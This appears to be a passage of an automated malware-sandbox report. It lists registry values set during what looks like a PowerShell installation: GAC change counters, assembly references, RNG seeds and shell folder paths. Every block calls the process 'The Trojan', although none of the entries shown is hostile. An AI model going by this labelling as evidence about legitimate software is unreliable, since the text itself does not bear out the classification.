[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "203"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "204"
"StoreChangeIDFor64BitProcesses" = "182"
"StoreChangeIDFor32BitProcesses" = "203"
The process PSCustomSetupUtil.exe:3008 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "95 4F BF 81 95 38 E5 26 08 56 D1 00 2C D0 0A AA"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.Commands.Management.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "6C 36 73 CC 6D BF D0 01"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "198"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "199"
[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Commands.Management.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeIDFor64BitProcesses" = "177"
"StoreChangeIDFor32BitProcesses" = "198"
The process PSCustomSetupUtil.exe:3660 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "CC 68 6E 8A 27 06 21 FC F5 4C E1 16 41 46 F0 16"
[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.GraphicalHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.GraphicalHost,1.0.0.0,,31bf3856ad364e35,MSIL" = "70 FE 85 CF 6D BF D0 01"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "204"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "205"
"StoreChangeIDFor64BitProcesses" = "183"
"StoreChangeIDFor32BitProcesses" = "204"
The process PSCustomSetupUtil.exe:3124 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2A 15 59 60 C8 29 CB A5 67 68 6C 5D BD 41 CA 62"
[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.WSMan.Management.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.WSMan.Management.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "A6 09 E8 CC 6D BF D0 01"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "202"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "203"
"StoreChangeIDFor64BitProcesses" = "181"
"StoreChangeIDFor32BitProcesses" = "202"
The process PSCustomSetupUtil.exe:2744 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A8 CA B4 37 56 9A B5 55 EC DE 9C AE 39 EF 77 14"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.Security,1.0.0.0,,31bf3856ad364e35,MSIL" = "B2 CC 65 CB 6D BF D0 01"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "191"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "192"
[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Security, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeIDFor64BitProcesses" = "170"
"StoreChangeIDFor32BitProcesses" = "191"
The process PSCustomSetupUtil.exe:2968 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B8 23 9E 5D FF E9 B9 7D E9 CE 06 ED 4F 43 2C 67"
[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.ConsoleHost.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.ConsoleHost.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "80 D5 51 CC 6D BF D0 01"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "197"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "198"
"StoreChangeIDFor64BitProcesses" = "176"
"StoreChangeIDFor32BitProcesses" = "197"
The process PSCustomSetupUtil.exe:3080 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "47 F0 CE BD 64 6E 04 69 E3 EB 94 7E 27 5A F5 90"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.Commands.Diagnostics.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "14 0B C9 CC 6D BF D0 01"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "201"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "202"
[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Commands.Diagnostics.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeIDFor64BitProcesses" = "180"
"StoreChangeIDFor32BitProcesses" = "201"
The process PSCustomSetupUtil.exe:2620 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "30 5E EE 26 7E 53 8E 29 15 AB 1E 31 2B BB 73 AA"
[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "188"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.ConsoleHost,1.0.0.0,,31bf3856ad364e35,MSIL" = "1E 97 EE CA 6D BF D0 01"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "189"
"StoreChangeIDFor64BitProcesses" = "167"
"StoreChangeIDFor32BitProcesses" = "188"
The process PSCustomSetupUtil.exe:2768 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "18 A8 76 8C 49 76 EB D3 50 16 58 67 E0 A4 A5 7A"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.Commands.Diagnostics,1.0.0.0,,31bf3856ad364e35,MSIL" = "AC 54 8E CB 6D BF D0 01"
[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Commands.Diagnostics, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "192"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "193"
"StoreChangeIDFor64BitProcesses" = "171"
"StoreChangeIDFor32BitProcesses" = "192"
The process PSCustomSetupUtil.exe:2876 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "36 1B 43 8C 36 3A DA 6D 3A A9 9E 3C B7 28 18 50"
[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.WSMan.Management, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.WSMan.Management,1.0.0.0,,31bf3856ad364e35,MSIL" = "46 02 DD CB 6D BF D0 01"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "194"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "195"
"StoreChangeIDFor64BitProcesses" = "173"
"StoreChangeIDFor32BitProcesses" = "194"
The process PSCustomSetupUtil.exe:2720 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F7 D2 20 17 47 3C 51 87 DA 1D FF 08 FD F9 17 20"
[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Commands.Utility, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "190"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.Commands.Utility,1.0.0.0,,31bf3856ad364e35,MSIL" = "12 A7 3F CB 6D BF D0 01"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "191"
"StoreChangeIDFor64BitProcesses" = "169"
"StoreChangeIDFor32BitProcesses" = "190"
The process PSCustomSetupUtil.exe:2924 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "31 FD 03 E1 C0 8F 4D BC 29 0F 43 2D 4F 0C 70 9A"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "196"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "197"
"System.Management.Automation.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "E0 AF 2B CC 6D BF D0 01"
[HKLM\SOFTWARE\Microsoft\Fusion\References\System.Management.Automation.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeIDFor64BitProcesses" = "175"
"StoreChangeIDFor32BitProcesses" = "196"
The process PSCustomSetupUtil.exe:3708 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A4 B5 47 E9 0A EE 00 CA 8A 4E 64 A3 2E FB BF 09"
[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.GPowerShell, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "206"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.GPowerShell,1.0.0.0,,31bf3856ad364e35,MSIL" = "EE 5D C6 CF 6D BF D0 01"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "207"
"StoreChangeIDFor64BitProcesses" = "185"
"StoreChangeIDFor32BitProcesses" = "206"
The process PSCustomSetupUtil.exe:3800 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A0 ED 46 FF 7E 0D 5B 23 77 13 4A E9 66 E8 14 F9"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.GPowerShell.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "4A F7 20 D0 6D BF D0 01"
[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.GPowerShell.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "209"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "210"
"StoreChangeIDFor64BitProcesses" = "188"
"StoreChangeIDFor32BitProcesses" = "209"
The process PSCustomSetupUtil.exe:3056 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "6C 63 73 55 DE 97 39 76 57 A5 7B 6D DB CE 5B F6"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.Security.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "DC 6E AC CC 6D BF D0 01"
[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Security.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "200"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "201"
"StoreChangeIDFor64BitProcesses" = "179"
"StoreChangeIDFor32BitProcesses" = "200"
The process PSCustomSetupUtil.exe:2836 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8F 5B 1C 8B B1 70 C6 3F 58 B5 C3 94 12 AD 85 83"
[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.WSMan.Runtime, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "193"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.WSMan.Runtime,1.0.0.0,,31bf3856ad364e35,MSIL" = "A6 DC B6 CB 6D BF D0 01"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "194"
"StoreChangeIDFor64BitProcesses" = "172"
"StoreChangeIDFor32BitProcesses" = "193"
The process PSCustomSetupUtil.exe:3644 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "7B D4 09 3E 12 02 13 36 2D D2 5E 02 AB 33 3A 2F"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
The process PSCustomSetupUtil.exe:2680 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E0 58 9A 78 FE 09 09 C0 2A 6E CB 61 E1 F3 88 70"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.Commands.Management,1.0.0.0,,31bf3856ad364e35,MSIL" = "18 1F 17 CB 6D BF D0 01"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "189"
[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Commands.Management, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "190"
"StoreChangeIDFor64BitProcesses" = "168"
"StoreChangeIDFor32BitProcesses" = "189"
The process PSCustomSetupUtil.exe:3032 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5A 2F E1 7D C8 CC 73 87 1B AD 36 B2 30 00 E1 D0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "199"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "200"
"Microsoft.PowerShell.Commands.Utility.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "A4 D2 8F CC 6D BF D0 01"
[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Commands.Utility.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeIDFor64BitProcesses" = "178"
"StoreChangeIDFor32BitProcesses" = "199"
The process PSCustomSetupUtil.exe:3684 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F2 BA 61 6F FF 82 E7 72 73 67 60 56 AC 01 2E AE"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.Editor,1.0.0.0,,31bf3856ad364e35,MSIL" = "02 FD A4 CF 6D BF D0 01"
[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Editor, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "205"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "206"
"StoreChangeIDFor64BitProcesses" = "184"
"StoreChangeIDFor32BitProcesses" = "205"
The process PSSetupNativeUtils.exe:4084 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3E 8A 80 95 45 ED 2C 21 26 EA 21 31 45 3C 77 87"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"
"Common Documents" = "%Documents and Settings%\All Users\Documents"
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
The process mscorsvw.exe:2596 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\109ad3ab\680c6dce\64]
"DisplayName" = "Microsoft.PowerShell.Editor,1.0.0.0,,31bf3856ad364e35"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\51be0150\645507bd\5d\InvertDependencies\3d4f0e50\1a238210]
"5b" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3d4f0e50\1a238210\5b]
